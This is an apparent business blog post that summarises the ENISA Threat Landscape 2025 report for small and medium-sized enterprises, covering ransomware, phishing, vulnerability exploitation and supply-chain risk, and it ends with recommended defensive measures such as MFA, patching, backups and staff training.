Urgent Security Update: What the EU’s Top Threat Report Means for Your Business

Cybersecurity threats are no longer reserved for major corporations. The ENISA Threat Landscape 2025 (ETL 2025) report from the European Union Agency for Cybersecurity (ENISA) makes it clear that cybercriminals are industrialising their attacks, making even Small and Medium-sized Enterprises (SMEs) high-value targets.

Although this report provides a broad overview of the European cyber threat ecosystem, covering nearly 4,900 incidents analysed between July 2024 and June 2025, the key findings underscore that basic cyber hygiene and robust resilience measures are vital for every private organisation.

1. The Core Threat: Driven by Profit

The most significant immediate threat to organisations of all sizes stems from financially motivated cybercriminals. This activity is fueled by a professionalised and resilient criminal ecosystem where the continuous proliferation of services like Ransomware-as-a-Service (RaaS) has lowered the barriers to entry for attackers.

The vast majority of cybercrime incidents targeting EU organisations involve ransomware (81.1%) and data breaches (15.2%). Adversaries are highly focused on aggressive extortion tactics and capitalising on fears related to regulatory compliance. When a breach occurs, the resulting data is frequently leaked on cybercriminal forums for sale.

A consistent and prevalent threat vector enabling these larger attacks are info-stealers. These malicious tools facilitate credential theft, session hijacking, and access brokering within the criminal supply chain. The Lumma info-stealer, for instance, was assessed as the most prevalent info-stealer since the beginning of 2025.

2. How Attackers Break In: Phishing and Exploits

SMEs must focus intensely on securing the two primary ways hackers gain initial access to networks, as documented in the ETL 2025:

Phishing Remains the Dominant Entry Point

Phishing continues to be the primary method for initial intrusion, accounting for 60% of observed cases. This social engineering tactic is used to steal credentials, hijack sessions, deploy payloads, or execute commands. Phishing is now industrialised through platforms like Phishing-as-a-Service (PhaaS), enabling operators of all skill levels to launch complex campaigns, such as those impersonating hundreds of organisations via the Darcula platform. Furthermore, AI has become a defining element, with AI-supported phishing campaigns reportedly representing more than 80% of observed social engineering activity worldwide by early 2025. Newer techniques, such as QR code phishing (quishing) and ClickFix-style scams (tricking users into executing PowerShell commands), are gaining momentum.

Rapid Exploitation of Vulnerabilities

Vulnerability exploitation remains a cornerstone of initial access, accounting for 21.3% of intrusions. The threat lies in the speed with which these weaknesses are exploited: widespread campaigns are rapidly weaponising vulnerabilities within days of their disclosure. Attackers frequently target internet-facing applications like VPN appliances (e.g., Citrix NetScaler, Fortinet, Check Point, Palo Alto), collaboration software (Confluence, TeamCity), and email servers (Exchange, Zimbra). This rapid weaponisation underscores the need for organizations to ensure timely patch availability and rigorous cyber hygiene practices.

3. The Amplified Risk of Supply Chains

Adversaries are increasingly optimising the efficiency and scale of their attacks by targeting third-party providers, such as Digital Services. The compromise of service providers amplifies risk throughout interconnected digital ecosystems. For example, the compromise of an external provider managing the Telemaco platform led to the paralysis of ticketing systems for Italian transport companies. Adversaries also exploit the digital supply chain by compromising software, open-source repositories, or deploying malicious browser extensions.

4. Essential Steps to Boost Your Cyber Resilience

The report stresses that defensive strategies must emphasise preventing initial compromise and ensuring resilience against attacks that succeed. Based on the recommended mitigation measures, SMEs should focus on three foundational areas:

1. Strengthen Identity and Access Controls: Multi-Factor Authentication (MFA) must be implemented to counter credential misuse. Businesses must also enforce strong password policies, and restrict user accounts to the minimum privileges necessary (Least-Privilege principles).
2. Maintain System Health and Visibility: Organisations must be disciplined about system hygiene, meaning software must be updated rigorously to prevent the exploitation of known weaknesses. Furthermore, basic security tools must be in place, including Antivirus/Antimalware solutions, and robust endpoint controls must be implemented for execution and behaviour prevention. Businesses should also be aware that cybercriminals are now actively using tools like AvNeutralizer and EDRKillShifter to disable Endpoint Detection and Response (EDR) solutions, making stealthier intrusions a serious concern.
3. Ensure Resilience and Awareness: Assuming some attacks may succeed, resilience controls are crucial. This requires maintaining reliable Data Backup strategies, storing data remotely or offline, and enforcing Network Segmentation to contain threats and limit their spread once a breach occurs. Finally, User Training is essential to help staff recognize and resist persistent social engineering attempts like phishing and vishing.

You can read the full report here.